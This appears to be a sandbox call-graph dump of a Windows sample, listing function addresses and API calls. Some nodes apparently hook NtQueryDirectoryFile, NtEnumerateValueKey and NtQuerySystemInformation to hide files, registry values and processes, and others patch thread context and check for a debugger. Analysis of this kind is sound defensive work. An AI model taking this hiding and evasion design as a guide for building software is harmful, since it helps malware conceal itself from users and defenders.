15224->15225 15225->15220 13602 1c565a4d 13603 1c565a54 13602->13603 13604 1c565abb 13603->13604 13605 1c565b37 VirtualProtect 13603->13605 13606 1c565b63 GetLastError 13605->13606 13607 1c565b71 13605->13607 13606->13607 14819 1c56baf4 14820 1c56bb0d 14819->14820 14821 1c56bb09 14819->14821 14834 1c56e624 14820->14834 14826 1c56bb1f 14828 1c56d060 __free_lconv_num 13 API calls 14826->14828 14827 1c56bb2b 14860 1c56bb68 14827->14860 14828->14821 14831 1c56d060 __free_lconv_num 13 API calls 14832 1c56bb52 14831->14832 14833 1c56d060 __free_lconv_num 13 API calls 14832->14833 14833->14821 14835 1c56e631 14834->14835 14836 1c56bb12 14834->14836 14879 1c56c88c 14835->14879 14840 1c56eb88 GetEnvironmentStringsW 14836->14840 14838 1c56e660 14884 1c56e2fc 14838->14884 14841 1c56bb17 14840->14841 14842 1c56ebb8 14840->14842 14841->14826 14841->14827 14843 1c56eaa8 WideCharToMultiByte 14842->14843 14844 1c56ec09 14843->14844 14845 1c56ec13 FreeEnvironmentStringsW 14844->14845 14846 1c56c390 14 API calls 14844->14846 14845->14841 14847 1c56ec23 14846->14847 14848 1c56ec34 14847->14848 14849 1c56ec2b 14847->14849 14851 1c56eaa8 WideCharToMultiByte 14848->14851 14850 1c56d060 __free_lconv_num 13 API calls 14849->14850 14852 1c56ec32 14850->14852 14853 1c56ec57 14851->14853 14852->14845 14854 1c56ec65 14853->14854 14855 1c56ec5b 14853->14855 14857 1c56d060 __free_lconv_num 13 API calls 14854->14857 14856 1c56d060 __free_lconv_num 13 API calls 14855->14856 14858 1c56ec63 FreeEnvironmentStringsW 14856->14858 14857->14858 14858->14841 14861 1c56bb8d 14860->14861 14862 1c56cfe0 _invalid_parameter_noinfo 13 API calls 14861->14862 14875 1c56bbc3 14862->14875 14863 1c56bbcb 14864 1c56d060 __free_lconv_num 13 API calls 14863->14864 14866 1c56bb33 14864->14866 14865 1c56bc2d 14867 1c56d060 __free_lconv_num 13 API calls 14865->14867 14866->14831 14867->14866 14868 1c56cfe0 _invalid_parameter_noinfo 13 API calls 14868->14875 14869 1c56bc52 15027 1c56bc7c 14869->15027 14870 1c56c0e8 __std_exception_copy 38 API calls 14870->14875 14873 1c56d060 __free_lconv_num 13 API calls 14873->14863 14874 1c56bc66 14876 1c56ce2c _invalid_parameter_noinfo 17 API calls 14874->14876 14875->14863 14875->14865 14875->14868 14875->14869 14875->14870 14875->14874 14877 1c56d060 __free_lconv_num 13 API calls 14875->14877 14878 1c56bc79 14876->14878 14877->14875 14880 1c56c8a8 FlsGetValue 14879->14880 14881 1c56c8a4 14879->14881 14880->14881 14882 1c56c8be 14881->14882 14883 1c56c700 _invalid_parameter_noinfo 13 API calls 14881->14883 14882->14838 14883->14882 14907 1c56e56c 14884->14907 14889 1c56e34e 14889->14836 14890 1c56c390 14 API calls 14891 1c56e35f 14890->14891 14892 1c56e367 14891->14892 14894 1c56e376 14891->14894 14893 1c56d060 __free_lconv_num 13 API calls 14892->14893 14893->14889 14894->14894 14926 1c56e6a0 14894->14926 14897 1c56e472 14898 1c56cfb4 __free_lconv_num 13 API calls 14897->14898 14899 1c56e477 14898->14899 14901 1c56d060 __free_lconv_num 13 API calls 14899->14901 14900 1c56e4cd 14903 1c56e534 14900->14903 14937 1c56de1c 14900->14937 14901->14889 14902 1c56e48c 14902->14900 14905 1c56d060 __free_lconv_num 13 API calls 14902->14905 14904 1c56d060 __free_lconv_num 13 API calls 14903->14904 14904->14889 14905->14900 14908 1c56e58f 14907->14908 14913 1c56e599 14908->14913 14952 1c56c318 EnterCriticalSection 14908->14952 14914 1c56e331 14913->14914 14916 1c56c88c 14 API calls 14913->14916 14919 1c56dfec 14914->14919 14917 1c56e660 14916->14917 14918 1c56e2fc 56 API calls 14917->14918 14918->14914 14920 1c56db38 14 API calls 14919->14920 14921 1c56e000 14920->14921 14922 1c56e01e 14921->14922 14923 1c56e00c GetOEMCP 14921->14923 14924 1c56e033 14922->14924 14925 1c56e023 GetACP 14922->14925 14923->14924 14924->14889 14924->14890 14925->14924 14927 1c56dfec 16 API calls 14926->14927 14929 1c56e6db 14927->14929 14928 1c56e831 14930 1c567e30 _invalid_parameter_noinfo 8 API calls 14928->14930 14929->14928 14931 1c56e718 IsValidCodePage 14929->14931 14936 1c56e732 _invalid_parameter_noinfo 14929->14936 14932 1c56e469 14930->14932 14931->14928 14933 1c56e729 14931->14933 14932->14897 14932->14902 14934 1c56e758 GetCPInfo 14933->14934 14933->14936 14934->14928 14934->14936 14953 1c56e104 14936->14953 15026 1c56c318 EnterCriticalSection 14937->15026 14954 1c56e14f GetCPInfo 14953->14954 14955 1c56e245 14953->14955 14954->14955 14960 1c56e162 14954->14960 14956 1c567e30 _invalid_parameter_noinfo 8 API calls 14955->14956 14958 1c56e2e4 14956->14958 14958->14928 14964 1c571234 14960->14964 14963 1c5716f8 33 API calls 14963->14955 14965 1c56db38 14 API calls 14964->14965 14966 1c571276 14965->14966 14967 1c56ea18 MultiByteToWideChar 14966->14967 14969 1c5712ac 14967->14969 14968 1c5712b3 14970 1c567e30 _invalid_parameter_noinfo 8 API calls 14968->14970 14969->14968 14971 1c56c390 14 API calls 14969->14971 14973 1c571370 14969->14973 14975 1c5712dc _invalid_parameter_noinfo 14969->14975 14972 1c56e1d9 14970->14972 14971->14975 14979 1c5716f8 14972->14979 14973->14968 14974 1c56d060 __free_lconv_num 13 API calls 14973->14974 14974->14968 14975->14973 14976 1c56ea18 MultiByteToWideChar 14975->14976 14977 1c571352 14976->14977 14977->14973 14978 1c571356 GetStringTypeW 14977->14978 14978->14973 14980 1c56db38 14 API calls 14979->14980 14981 1c57171d 14980->14981 14984 1c5713c4 14981->14984 14985 1c571405 14984->14985 14986 1c56ea18 MultiByteToWideChar 14985->14986 14988 1c57144f 14986->14988 14987 1c567e30 _invalid_parameter_noinfo 8 API calls 14989 1c56e20c 14987->14989 14990 1c56c390 14 API calls 14988->14990 14991 1c5716cd 14988->14991 14992 1c571585 14988->14992 14994 1c571487 14988->14994 14989->14963 14990->14994 14991->14987 14992->14991 14993 1c56d060 __free_lconv_num 13 API calls 14992->14993 14993->14991 14994->14992 14995 1c56ea18 MultiByteToWideChar 14994->14995 14996 1c5714fa 14995->14996 14996->14992 15015 1c56efd8 14996->15015 14998 1c57152d 14998->14992 14999 1c571596 14998->14999 15000 1c571545 14998->15000 15001 1c56c390 14 API calls 14999->15001 15003 1c571668 14999->15003 15005 1c5715b4 14999->15005 15000->14992 15002 1c56efd8 10 API calls 15000->15002 15001->15005 15002->14992 15003->14992 15004 1c56d060 __free_lconv_num 13 API calls 15003->15004 15004->14992 15005->14992 15006 1c56efd8 10 API calls 15005->15006 15007 1c571634 15006->15007 15007->15003 15008 1c571654 15007->15008 15009 1c57166a 15007->15009 15010 1c56eaa8 WideCharToMultiByte 15008->15010 15011 1c56eaa8 WideCharToMultiByte 15009->15011 15012 1c571662 15010->15012 15011->15012 15012->15003 15013 1c571682 15012->15013 15013->14992 15014 1c56d060 __free_lconv_num 13 API calls 15013->15014 15014->14992 15017 1c56f004 15015->15017 15021 1c56f027 15015->15021 15019 1c56ed48 9 API calls 15017->15019 15020 1c56f02f 15017->15020 15018 1c56f08d LCMapStringW 15018->15020 15019->15021 15020->14998 15021->15020 15022 1c56f0cc 15021->15022 15023 1c56f10a 15022->15023 15024 1c56f0e8 15022->15024 15023->15018 15024->15023 15025 1c56ed48 9 API calls 15024->15025 15025->15023 15028 1c56bc81 15027->15028 15029 1c56bc5a 15027->15029 15030 1c56bcaa 15028->15030 15031 1c56d060 __free_lconv_num 13 API calls 15028->15031 15029->14873 15032 1c56d060 __free_lconv_num 13 API calls 15030->15032 15031->15028 15032->15029 13612 1c5624f0 NtQueryDirectoryFile 13613 1c5626ab 13612->13613 13614 1c562586 _invalid_parameter_noinfo 13612->13614 13614->13613 13615 1c5625dd GetFileType 13614->13615 13616 1c562601 13615->13616 13617 1c5625eb StrCpyW 13615->13617 13619 1c561ad0 4 API calls 13616->13619 13618 1c562610 13617->13618 13622 1c5626b0 13618->13622 13624 1c562619 13618->13624 13619->13618 13620 1c563d4c StrCmpNIW 13620->13622 13621 1c563d4c StrCmpNIW 13621->13624 13622->13613 13622->13620 13623 1c5634d8 4 API calls 13622->13623 13625 1c561dd0 2 API calls 13622->13625 13623->13622 13624->13613 13624->13621 13626 1c5634d8 4 API calls 13624->13626 13627 1c561dd0 2 API calls 13624->13627 13625->13622 13626->13624 13627->13624 13629 1c5661f0 13630 1c5661fd 13629->13630 13631 1c566209 13630->13631 13637 1c56631a 13630->13637 13632 1c56623e 13631->13632 13633 1c56628d 13631->13633 13634 1c566266 SetThreadContext 13632->13634 13634->13633 13635 1c566341 VirtualProtect FlushInstructionCache 13635->13637 13636 1c5663fe 13638 1c56641e 13636->13638 13651 1c5648e0 13636->13651 13637->13635 13637->13636 13647 1c5652f0 GetCurrentProcess 13638->13647 13641 1c566423 13642 1c566477 13641->13642 13643 1c566437 ResumeThread 13641->13643 13655 1c567e30 13642->13655 13644 1c56646b 13643->13644 13644->13641 13648 1c56530c 13647->13648 13649 1c565322 VirtualProtect FlushInstructionCache 13648->13649 13650 1c565353 13648->13650 13649->13648 13650->13641 13653 1c5648fc 13651->13653 13652 1c56495f 13652->13638 13653->13652 13654 1c564912 VirtualFree 13653->13654 13654->13653 13656 1c567e39 13655->13656 13657 1c568608 IsProcessorFeaturePresent 13656->13657 13658 1c5664bf 13656->13658 13659 1c568620 13657->13659 13664 1c5686dc RtlCaptureContext 13659->13664 13665 1c5686f6 RtlLookupFunctionEntry 13664->13665 13666 1c568633 13665->13666 13667 1c56870c RtlVirtualUnwind 13665->13667 13668 1c5685d4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13666->13668 13667->13665 13667->13666 14603 1c56e9f0 GetCommandLineA GetCommandLineW 14535 1c57117c 14536 1c57118e 14535->14536 14537 1c5711b5 14536->14537 14538 1c5711ce 14536->14538 14539 1c56cfb4 __free_lconv_num 13 API calls 14537->14539 14541 1c56db38 14 API calls 14538->14541 14543 1c5711c5 14538->14543 14540 1c5711ba 14539->14540 14542 1c56ce0c _invalid_parameter_noinfo 38 API calls 14540->14542 14541->14543 14542->14543 14544 1c563178 14545 1c56319f 14544->14545 14546 1c56326c 14545->14546 14547 1c5631bc PdhGetCounterInfoW 14545->14547 14547->14546 14548 1c5631de GetProcessHeap HeapAlloc PdhGetCounterInfoW 14547->14548 14549 1c563210 StrCmpW 14548->14549 14550 1c563258 GetProcessHeap HeapFree 14548->14550 14549->14550 14551 1c563225 14549->14551 14550->14546 14551->14550 14553 1c563720 StrCmpNW 14551->14553 14554 1c563752 StrStrW 14553->14554 14557 1c5637c2 14553->14557 14555 1c56376b StrToIntW 14554->14555 14554->14557 14556 1c563793 14555->14556 14555->14557 14556->14557 14563 1c561a30 OpenProcess 14556->14563 14557->14551 14560 1c563d4c StrCmpNIW 14561 1c5637b4 14560->14561 14561->14557 14562 1c561cf8 2 API calls 14561->14562 14562->14557 14564 1c561ab4 14563->14564 14565 1c561a64 K32GetProcessImageFileNameW 14563->14565 14564->14557 14564->14560 14566 1c561a7c PathFindFileNameW lstrlenW 14565->14566 14567 1c561aab CloseHandle 14565->14567 14566->14567 14568 1c561a9a StrCpyW 14566->14568 14567->14564 14568->14567 14479 1c5640e0 14480 1c56402d _invalid_parameter_noinfo 14479->14480 14481 1c56407d VirtualQuery 14480->14481 14482 1c5640e2 GetLastError 14480->14482 14483 1c564097 14480->14483 14481->14480 14481->14483 14482->14480 14482->14483 14604 1c56f5e0 14607 1c56f598 14604->14607 14612 1c56c318 EnterCriticalSection 14607->14612 15226 1c56fbe0 15227 1c56fc0a 15226->15227 15228 1c56cfe0 _invalid_parameter_noinfo 13 API calls 15227->15228 15229 1c56fc2a 15228->15229 15230 1c56d060 __free_lconv_num 13 API calls 15229->15230 15231 1c56fc38 15230->15231 15232 1c56fc62 15231->15232 15233 1c56cfe0 _invalid_parameter_noinfo 13 API calls 15231->15233 15234 1c56fc81 InitializeCriticalSectionEx 15232->15234 15236 1c56fc6b 15232->15236 15235 1c56fc54 15233->15235 15234->15232 15237 1c56d060 __free_lconv_num 13 API calls 15235->15237 15237->15232 13688 1c562b6c NtEnumerateValueKey 13689 1c562c14 13688->13689 13691 1c562bb8 13688->13691 13690 1c562bc6 NtEnumerateValueKey 13690->13691 13691->13689 13691->13690 13692 1c563d4c StrCmpNIW 13691->13692 13692->13691 13716 1c56a86c 13717 1c56a899 __except_validate_context_record 13716->13717 13733 1c5690e4 13717->13733 13719 1c56a89e 13721 1c56a8f8 13719->13721 13723 1c56a986 13719->13723 13731 1c56a94c 13719->13731 13720 1c56a9f4 13720->13731 13761 1c569fec 13720->13761 13722 1c56a973 13721->13722 13730 1c56a91a __GetCurrentState 13721->13730 13721->13731 13748 1c569390 13722->13748 13727 1c56a9a5 13723->13727 13755 1c56978c 13723->13755 13727->13720 13727->13731 13758 1c5697a0 13727->13758 13728 1c56aa9d 13730->13728 13736 1c56ad78 13730->13736 13818 1c569100 13733->13818 13735 1c5690ed 13735->13719 13737 1c56978c Is_bad_exception_allowed 9 API calls 13736->13737 13738 1c56ada7 __GetCurrentState 13737->13738 13739 1c5690e4 __CxxCallCatchBlock 9 API calls 13738->13739 13741 1c56adc4 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 13739->13741 13740 1c56aebb 13742 1c5690e4 __CxxCallCatchBlock 9 API calls 13740->13742 13741->13740 13745 1c56aecb __FrameHandler3::GetHandlerSearchState 13741->13745 13746 1c56978c 9 API calls Is_bad_exception_allowed 13741->13746 13843 1c5697b4 13741->13843 13743 1c56aec0 13742->13743 13744 1c5690e4 __CxxCallCatchBlock 9 API calls 13743->13744 13743->13745 13744->13745 13745->13731 13746->13741 13846 1c5693f4 13748->13846 13750 1c5693af __FrameHandler3::GetHandlerSearchState 13850 1c569300 13750->13850 13753 1c56ad78 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 13754 1c5693e4 13753->13754 13754->13731 13756 1c5690e4 __CxxCallCatchBlock 9 API calls 13755->13756 13757 1c569795 13756->13757 13757->13727 13759 1c5690e4 __CxxCallCatchBlock 9 API calls 13758->13759 13760 1c5697a9 13759->13760 13760->13720 13854 1c56af04 13761->13854 13763 1c56a4b4 13764 1c56a405 13764->13763 13804 1c56a403 13764->13804 13907 1c56a4bc 13764->13907 13765 1c56a133 13765->13764 13777 1c56a16b 13765->13777 13767 1c5690e4 __CxxCallCatchBlock 9 API calls 13771 1c56a447 13767->13771 13768 1c56a335 13774 1c56a352 13768->13774 13776 1c56978c Is_bad_exception_allowed 9 API calls 13768->13776 13768->13804 13769 1c5690e4 __CxxCallCatchBlock 9 API calls 13772 1c56a09a 13769->13772 13771->13763 13773 1c567e30 _invalid_parameter_noinfo 8 API calls 13771->13773 13772->13771 13778 1c5690e4 __CxxCallCatchBlock 9 API calls 13772->13778 13775 1c56a45a 13773->13775 13781 1c56a374 13774->13781 13774->13804 13900 1c569364 13774->13900 13775->13731 13776->13774 13777->13768 13801 1c5697a0 9 API calls 13777->13801 13879 1c56a72c 13777->13879 13893 1c569f18 13777->13893 13780 1c56a0aa 13778->13780 13782 1c5690e4 __CxxCallCatchBlock 9 API calls 13780->13782 13783 1c56a38a 13781->13783 13781->13804 13815 1c56a497 13781->13815 13784 1c56a0b3 13782->13784 13787 1c56978c Is_bad_exception_allowed 9 API calls 13783->13787 13790 1c56a395 13783->13790 13865 1c5697cc 13784->13865 13785 1c5690e4 __CxxCallCatchBlock 9 API calls 13788 1c56a49d 13785->13788 13787->13790 13791 1c5690e4 __CxxCallCatchBlock 9 API calls 13788->13791 13789 1c56af9c 9 API calls 13794 1c56a3ab 13789->13794 13790->13789 13793 1c56a4a6 13791->13793 13796 1c56c0b4 14 API calls 13793->13796 13798 1c5693f4 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 13794->13798 13794->13804 13795 1c5690e4 __CxxCallCatchBlock 9 API calls 13797 1c56a0f5 13795->13797 13796->13763 13797->13765 13800 1c5690e4 __CxxCallCatchBlock 9 API calls 13797->13800 13799 1c56a3c5 13798->13799 13904 1c5695f8 RtlUnwindEx 13799->13904 13803 1c56a101 13800->13803 13801->13777 13805 1c5690e4 __CxxCallCatchBlock 9 API calls 13803->13805 13804->13767 13807 1c56a10a 13805->13807 13868 1c56af9c 13807->13868 13811 1c56a11e 13875 1c56b08c 13811->13875 13813 1c56a491 13924 1c56c0b4 13813->13924 13815->13785 13816 1c56a126 __CxxCallCatchBlock std::bad_alloc::bad_alloc 13816->13813 13919 1c568f38 13816->13919 13819 1c56911f GetLastError 13818->13819 13820 1c569118 13818->13820 13830 1c569a4c 13819->13830 13820->13735 13834 1c56986c 13830->13834 13835 1c569956 TlsGetValue 13834->13835 13836 1c5698b0 __vcrt_FlsAlloc 13834->13836 13836->13835 13837 1c5698de LoadLibraryExW 13836->13837 13838 1c56999d GetProcAddress 13836->13838 13842 1c569921 LoadLibraryExW 13836->13842 13839 1c5698ff GetLastError 13837->13839 13840 1c56997d 13837->13840 13838->13835 13839->13836 13840->13838 13841 1c569994 FreeLibrary 13840->13841 13841->13838 13842->13836 13842->13840 13844 1c5690e4 __CxxCallCatchBlock 9 API calls 13843->13844 13845 1c5697c2 13844->13845 13845->13741 13849 1c569422 __FrameHandler3::GetHandlerSearchState 13846->13849 13847 1c569494 13847->13750 13848 1c56944c RtlLookupFunctionEntry 13848->13849 13849->13847 13849->13848 13851 1c569320 13850->13851 13852 1c56934b 13850->13852 13851->13852 13853 1c5690e4 __CxxCallCatchBlock 9 API calls 13851->13853 13852->13753 13853->13851 13855 1c56af29 __FrameHandler3::GetHandlerSearchState 13854->13855 13856 1c5693f4 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 13855->13856 13857 1c56af3e 13856->13857 13927 1c569b74 13857->13927 13860 1c56af73 13862 1c569b74 __GetUnwindTryBlock RtlLookupFunctionEntry 13860->13862 13861 1c56af50 __FrameHandler3::GetHandlerSearchState 13930 1c569bac 13861->13930 13863 1c56a04e 13862->13863 13863->13763 13863->13765 13863->13769 13866 1c5690e4 __CxxCallCatchBlock 9 API calls 13865->13866 13867 1c5697da 13866->13867 13867->13763 13867->13795 13869 1c56b083 13868->13869 13874 1c56afc7 13868->13874 13870 1c56a11a 13870->13765 13870->13811 13871 1c5697a0 9 API calls 13871->13874 13872 1c56978c Is_bad_exception_allowed 9 API calls 13872->13874 13873 1c56a72c 9 API calls 13873->13874 13874->13870 13874->13871 13874->13872 13874->13873 13877 1c56b0f9 13875->13877 13878 1c56b0a9 Is_bad_exception_allowed 13875->13878 13876 1c56978c 9 API calls Is_bad_exception_allowed 13876->13878 13877->13816 13878->13876 13878->13877 13880 1c56a759 13879->13880 13891 1c56a7e8 13879->13891 13881 1c56978c Is_bad_exception_allowed 9 API calls 13880->13881 13882 1c56a762 13881->13882 13883 1c56978c Is_bad_exception_allowed 9 API calls 13882->13883 13884 1c56a77b 13882->13884 13882->13891 13883->13884 13885 1c56a7a7 13884->13885 13886 1c56978c Is_bad_exception_allowed 9 API calls 13884->13886 13884->13891 13887 1c5697a0 9 API calls 13885->13887 13886->13885 13888 1c56a7bb 13887->13888 13889 1c56a7d4 13888->13889 13890 1c56978c Is_bad_exception_allowed 9 API calls 13888->13890 13888->13891 13892 1c5697a0 9 API calls 13889->13892 13890->13889 13891->13777 13892->13891 13894 1c5693f4 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 13893->13894 13895 1c569f55 13894->13895 13896 1c56978c Is_bad_exception_allowed 9 API calls 13895->13896 13897 1c569f8d 13896->13897 13898 1c5695f8 9 API calls 13897->13898 13899 1c569fd1 13898->13899 13899->13777 13901 1c569378 __FrameHandler3::GetHandlerSearchState 13900->13901 13902 1c569300 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 13901->13902 13903 1c569382 13902->13903 13903->13781 13905 1c567e30 _invalid_parameter_noinfo 8 API calls 13904->13905 13906 1c5696f2 13905->13906 13906->13804 13908 1c56a4f5 13907->13908 13912 1c56a708 13907->13912 13909 1c5690e4 __CxxCallCatchBlock 9 API calls 13908->13909 13910 1c56a4fa 13909->13910 13911 1c56a519 EncodePointer 13910->13911 13918 1c56a56c 13910->13918 13913 1c5690e4 __CxxCallCatchBlock 9 API calls 13911->13913 13912->13804 13914 1c56a529 13913->13914 13914->13918 13933 1c5692ac 13914->13933 13916 1c56978c 9 API calls Is_bad_exception_allowed 13916->13918 13917 1c569f18 19 API calls 13917->13918 13918->13912 13918->13916 13918->13917 13920 1c568f57 13919->13920 13921 1c568fa2 RaiseException 13920->13921 13922 1c568f80 RtlPcToFileHeader 13920->13922 13921->13813 13923 1c568f98 13922->13923 13923->13921 13936 1c56c870 13924->13936 13926 1c56c0bd 13928 1c5693f4 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 13927->13928 13929 1c569b87 13928->13929 13929->13860 13929->13861 13931 1c5693f4 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 13930->13931 13932 1c569bc6 13931->13932 13932->13863 13934 1c5690e4 __CxxCallCatchBlock 9 API calls 13933->13934 13935 1c5692d8 13934->13935 13935->13918 13944 1c56c8d0 13936->13944 13938 1c56c87e 13938->13926 13939 1c56c879 13939->13938 13940 1c56c8a8 FlsGetValue 13939->13940 13942 1c56c8a4 13939->13942 13940->13942 13941 1c56c8be 13941->13926 13942->13941 13953 1c56c700 GetLastError 13942->13953 13945 1c56c919 GetLastError 13944->13945 13950 1c56c8ef __free_lconv_num 13944->13950 13946 1c56c92c 13945->13946 13947 1c56c94a SetLastError 13946->13947 13949 1c56c947 13946->13949 13951 1c56c700 _invalid_parameter_noinfo 11 API calls 13946->13951 13948 1c56c914 13947->13948 13948->13939 13949->13947 13950->13948 13952 1c56c700 _invalid_parameter_noinfo 11 API calls 13950->13952 13951->13949 13952->13948 13954 1c56c726 13953->13954 13955 1c56c72c SetLastError 13954->13955 13971 1c56cfe0 13954->13971 13956 1c56c7a5 13955->13956 13956->13941 13959 1c56c765 FlsSetValue 13962 1c56c771 FlsSetValue 13959->13962 13963 1c56c788 13959->13963 13960 1c56c755 FlsSetValue 13978 1c56d060 13960->13978 13966 1c56d060 __free_lconv_num 7 API calls 13962->13966 13984 1c56c518 13963->13984 13968 1c56c786 SetLastError 13966->13968 13968->13956 13976 1c56cff1 _invalid_parameter_noinfo 13971->13976 13972 1c56d042 13992 1c56cfb4 13972->13992 13973 1c56d026 HeapAlloc 13974 1c56c747 13973->13974 13973->13976 13974->13959 13974->13960 13976->13972 13976->13973 13989 1c56b230 13976->13989 13979 1c56d065 HeapFree 13978->13979 13980 1c56c763 13978->13980 13979->13980 13981 1c56d080 GetLastError 13979->13981 13980->13955 13982 1c56d08d __free_lconv_num 13981->13982 13983 1c56cfb4 __free_lconv_num 11 API calls 13982->13983 13983->13980 14001 1c56c3f0 13984->14001 13995 1c56b280 13989->13995 13993 1c56c8d0 __free_lconv_num 13 API calls 13992->13993 13994 1c56cfbd 13993->13994 13994->13974 14000 1c56c318 EnterCriticalSection 13995->14000 14013 1c56c318 EnterCriticalSection 14001->14013 14613 1c56c5e8 14614 1c56c5ed 14613->14614 14618 1c56c602 14613->14618 14619 1c56c608 14614->14619 14620 1c56c652 14619->14620 14621 1c56c64a 14619->14621 14623 1c56d060 __free_lconv_num 13 API calls 14620->14623 14622 1c56d060 __free_lconv_num 13 API calls 14621->14622 14622->14620 14624 1c56c65f 14623->14624 14625 1c56d060 __free_lconv_num 13 API calls 14624->14625 14626 1c56c66c 14625->14626 14627 1c56d060 __free_lconv_num 13 API calls 14626->14627 14628 1c56c679 14627->14628 14629 1c56d060 __free_lconv_num 13 API calls 14628->14629 14630 1c56c686 14629->14630 14631 1c56d060 __free_lconv_num 13 API calls 14630->14631 14632 1c56c693 14631->14632 14633 1c56d060 __free_lconv_num 13 API calls 14632->14633 14634 1c56c6a0 14633->14634 14635 1c56d060 __free_lconv_num 13 API calls 14634->14635 14636 1c56c6ad 14635->14636 14637 1c56d060 __free_lconv_num 13 API calls 14636->14637 14638 1c56c6bd 14637->14638 14639 1c56d060 __free_lconv_num 13 API calls 14638->14639 14640 1c56c6cd 14639->14640 14645 1c56c4b8 14640->14645 14659 1c56c318 EnterCriticalSection 14645->14659 14569 1c570d68 14570 1c570d8c 14569->14570 14571 1c567e30 _invalid_parameter_noinfo 8 API calls 14570->14571 14572 1c570dce 14571->14572 13519 1c562214 NtQuerySystemInformation 13520 1c562250 13519->13520 13521 1c56235b 13520->13521 13527 1c562269 13520->13527 13530 1c562326 13520->13530 13522 1c562360 13521->13522 13523 1c5623cf 13521->13523 13537 1c563398 GetProcessHeap HeapAlloc NtQuerySystemInformation 13522->13537 13526 1c563398 12 API calls 13523->13526 13523->13530 13525 1c5622a1 StrCmpNIW 13525->13527 13526->13530 13527->13525 13529 1c5622c8 13527->13529 13527->13530 13529->13527 13531 1c561d2c 13529->13531 13532 1c561d53 GetProcessHeap HeapAlloc 13531->13532 13533 1c561db0 13531->13533 13532->13533 13534 1c561d8e 13532->13534 13533->13529 13544 1c561cf8 13534->13544 13538 1c5634a9 GetProcessHeap RtlFreeHeap 13537->13538 13539 1c5633f3 13537->13539 13538->13530 13540 1c5634a4 13539->13540 13541 1c563436 StrCmpNIW 13539->13541 13542 1c563459 13539->13542 13540->13538 13541->13539 13542->13539 13543 1c561d2c 6 API calls 13542->13543 13543->13542 13545 1c561d18 GetProcessHeap HeapFree 13544->13545 13546 1c561d0f 13544->13546 13545->13533 13548 1c561530 13546->13548 13549 1c56154a 13548->13549 13552 1c561580 13548->13552 13550 1c561561 StrCmpIW 13549->13550 13551 1c561569 StrCmpW 13549->13551 13549->13552 13550->13549 13551->13549 13552->13545 15033 1c56ae94 15035 1c56adc7 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 15033->15035 15034 1c56aebb 15036 1c5690e4 __CxxCallCatchBlock 9 API calls 15034->15036 15035->15034 15039 1c56aecb __FrameHandler3::GetHandlerSearchState 15035->15039 15040 1c56978c 9 API calls Is_bad_exception_allowed 15035->15040 15041 1c5697b4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 15035->15041 15037 1c56aec0 15036->15037 15038 1c5690e4 __CxxCallCatchBlock 9 API calls 15037->15038 15037->15039 15038->15039 15040->15035 15041->15035 14487 1c568490 14488 1c568e80 __std_exception_copy 38 API calls 14487->14488 14489 1c5684b9 14488->14489 15238 1c571790 15239 1c56e624 56 API calls 15238->15239 15240 1c571799 15239->15240 13598 7ffb4adf7b41 13599 7ffb4adf7b5f CheckRemoteDebuggerPresent 13598->13599 13601 7ffb4adf7bff 13599->13601 14015 1c57441f 14016 1c5744a2 14015->14016 14017 1c574437 14015->14017 14017->14016 14018 1c5690e4 __CxxCallCatchBlock 9 API calls 14017->14018 14019 1c574484 14018->14019 14020 1c5690e4 __CxxCallCatchBlock 9 API calls 14019->14020 14021 1c574499 14020->14021 14022 1c56c0b4 14 API calls 14021->14022 14022->14016 14743 1c57461e 14744 1c5690e4 __CxxCallCatchBlock 9 API calls 14743->14744 14745 1c57462c 14744->14745 14746 1c574637 14745->14746 14747 1c5690e4 __CxxCallCatchBlock 9 API calls 14745->14747 14747->14746 14490 1c56f49c 14491 1c56f4a8 14490->14491 14493 1c56f4cf 14491->14493 14494 1c5719cc 14491->14494 14495 1c5719d1 14494->14495 14496 1c571a0c 14494->14496 14497 1c571a04 14495->14497 14498 1c5719f2 DeleteCriticalSection 14495->14498 14496->14491 14499 1c56d060 __free_lconv_num 13 API calls 14497->14499 14498->14497 14498->14498 14499->14496 14023 1c56d418 14024 1c56d43d 14023->14024 14029 1c56d454 14023->14029 14025 1c56cfb4 __free_lconv_num 13 API calls 14024->14025 14026 1c56d442 14025->14026 14056 1c56ce0c 14026->14056 14027 1c56d4e4 14158 1c56b914 14027->14158 14029->14027 14038 1c56d49a 14029->14038 14040 1c56d576 14029->14040 14059 1c56d654 14029->14059 14121 1c56d7d8 14029->14121 14031 1c56d44d 14034 1c56d544 14037 1c56d060 __free_lconv_num 13 API calls 14034->14037 14036 1c56d5f6 14041 1c56d060 __free_lconv_num 13 API calls 14036->14041 14039 1c56d54b 14037->14039 14042 1c56d4bd 14038->14042 14047 1c56d060 __free_lconv_num 13 API calls 14038->14047 14039->14042 14048 1c56d060 __free_lconv_num 13 API calls 14039->14048 14040->14042 14046 1c56d060 __free_lconv_num 13 API calls 14040->14046 14044 1c56d601 14041->14044 14049 1c56d060 __free_lconv_num 13 API calls 14042->14049 14043 1c56d597 14043->14036 14043->14043 14053 1c56d63c 14043->14053 14164 1c570c78 14043->14164 14045 1c56d61a 14044->14045 14050 1c56d060 __free_lconv_num 13 API calls 14044->14050 14051 1c56d060 __free_lconv_num 13 API calls 14045->14051 14046->14040 14047->14038 14048->14039 14049->14031 14050->14044 14051->14031 14173 1c56ce2c IsProcessorFeaturePresent 14053->14173 14177 1c56ccb8 14056->14177 14060 1c56d682 14059->14060 14060->14060 14061 1c56d69e 14060->14061 14062 1c56cfe0 _invalid_parameter_noinfo 13 API calls 14060->14062 14061->14029 14063 1c56d6cd 14062->14063 14064 1c56d6e6 14063->14064 14066 1c570c78 38 API calls 14063->14066 14065 1c570c78 38 API calls 14064->14065 14076 1c56d7bc 14064->14076 14067 1c56d703 14065->14067 14066->14064 14069 1c56d722 14067->14069 14070 1c56d74d 14067->14070 14067->14076 14089 1c56d73f 14067->14089 14068 1c56ce2c _invalid_parameter_noinfo 17 API calls 14073 1c56d7d7 14068->14073 14071 1c56cfe0 _invalid_parameter_noinfo 13 API calls 14069->14071 